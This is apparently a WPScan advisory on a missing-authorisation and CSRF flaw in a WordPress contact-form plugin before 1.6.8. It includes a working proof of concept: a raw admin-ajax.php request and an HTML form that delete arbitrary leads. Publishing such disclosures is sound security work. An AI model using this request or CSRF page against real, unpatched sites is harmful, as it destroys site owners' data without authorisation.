WordPress Plugin Vulnerabilities
Contact Form & Lead Form Elementor Builder < 1.6.8 - Subscriber+ Arbitrary Lead Deletion
Description
The plugin does not have capability and CSRF checks in the delete_leads_backend AJAX action, available to any authenticated users. As a result, users with a role as low as subscriber could delete arbitrary Leads. Attackers could also make any logged in users delete leads via a CSRF attack
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 38
Connection: close
Cookie: [any authenticated user]
lead_id=1&action=delete_leads_backend
<html>
<body>
<form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
<input type="hidden" name="lead_id" value="3" />
<input type="hidden" name="action" value="delete_leads_backend" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Affects Plugins
Fixed in 1.6.8 Classification
Type
NO AUTHORISATION
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-12-22 (about 2 years ago)
Added
2022-02-01 (about 2 years ago)
Last Updated
2022-02-01 (about 2 years ago)
WPScan 